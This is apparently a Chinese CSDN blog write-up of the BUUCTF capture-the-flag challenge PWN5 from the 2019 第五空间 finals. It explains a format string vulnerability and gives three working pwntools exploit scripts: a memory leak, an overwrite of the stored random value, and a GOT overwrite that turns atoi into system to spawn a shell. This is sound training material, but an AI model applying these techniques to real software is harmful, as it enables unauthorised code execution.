BUUCTF的[第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-11 16:24:58 发布
最新推荐文章于 2024-04-11 16:24:58 发布
阅读量139 收藏
点赞数 1
分类专栏: CTF PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/frist_csdn/article/details/123153967
版权
CTF 同时被 2 个专栏收录
1 篇文章 0 订阅
订阅专栏
PWN
1 篇文章 0 订阅
订阅专栏

使用IDA打开

可以看到明显的格式化字符串漏洞 ,它是在bss段0x804c044存储了一个随机数,然后通过最后比较输入的passwd和随机数是否一样,如果一样就打开/bin/sh命令。
我的思路是,通过格式化字符串漏洞泄露0x804c044的数据,然后把得到的数据作为有符号的整数的字符串输入给nptr,然后程序会用atoi把字符串转换为整型。
在pwndbg中对程序调试,发现输入的buf和esp差距为0x28,所以是第十个格式化参数。 
from pwn import *
p = remote("node4.buuoj.cn", 29667)
#p = process('./pwn')
payload = flat(0x804c044, "ok%10$sok")
p.recv()
p.sendline(payload)
p.recvuntil("ok")
num = p.recvuntil("ok",drop = True)
n = u32(num)

## 因为使用u32()函数在64位机器上解包得到的数字不会出现负数,所以自己对n进行判断,如果大于0x100000000,就肯定是一个负数的补码。
if n>0x8fffffff:
    n = n-0x100000000
p.sendline(str(n))
p.interactive()

后来在看了其他人的博客后,又得到了新的解题思路:

1、直接利用格式化漏洞修改0x804c044的内容,然后把修改的内容发送给程序。

from pwn import *
p = remote("node4.buuoj.cn", 29667)
#p = process('./pwn')
payload = flat(0x804c044, "%10$n")

##或者下面这个payload
#payload = fmtstr_payload(10,{0x804c044:0x4})
p.recv()
p.sendline(payload)
p.recv()
p.sendline(str(4))
p.interactive()

2、利用格式化字符串漏洞修改atoi_got表里面的函数地址为system的plt地址,这样atoi执行的时候会在plt跳转到got表里面保存的函数地址时,变为跳转到system的plt表并执行,然后从system的plt表跳转到system真实函数地址去执行。因为后面输入passwd刚好是作为atoi函数的参数,所以可以输入“/bin/sh\x00”字符串作为system的参数。

from pwn import *
p = remote("node4.buuoj.cn", 29667)
#p = process('./pwn')
elf = ELF('./pwn')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload=fmtstr_payload(10,{atoi_got:system_plt})
p.recv()
p.sendline(payload)
p.recv()
p.sendline('/bin/sh\x00')
p.interactive()

frist_csdn
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[第五空间2019 决赛]PWN5
m0_52231248的博客
11-02 88
[第五空间2019 决赛]PWN5 题目Ubuntu16,libc2.23 Checksec检查发现开启了canary和nx 进入main函数发现gets函数存在格式化字符串漏洞 并且程序会检查我们输入的password是否等于unk_804C044这个随机数,成功会直接给我们调用system(“/bin/sh”),因此我们检查unk_804C044位置发现位于bss段 接下来只要确认我们输入的数据到unk_804C044的偏移即可修改unk_804C044。 可以通过.%p或者gd
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 406
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2220
通过PWN5一题尝试理解格式化字符串漏洞。
Buuctf[第五空间决赛2024]pwn5
最新发布
2401_83974345的博客
04-11 793
发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞3.“访问”构造Python脚本偏移量为10)
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1387
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 610
简单易懂~
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 406
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 791
BUUCTF--pwn--[第五空间2019 决赛]PWN5
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4329
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
BUUCTF-pwn(5)
njh18790816639的博客
11-25 398
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2511
[第五空间2019 决赛]PWN5 ——两种解法
[BUUCTF]-PWN:[第五空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 327
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值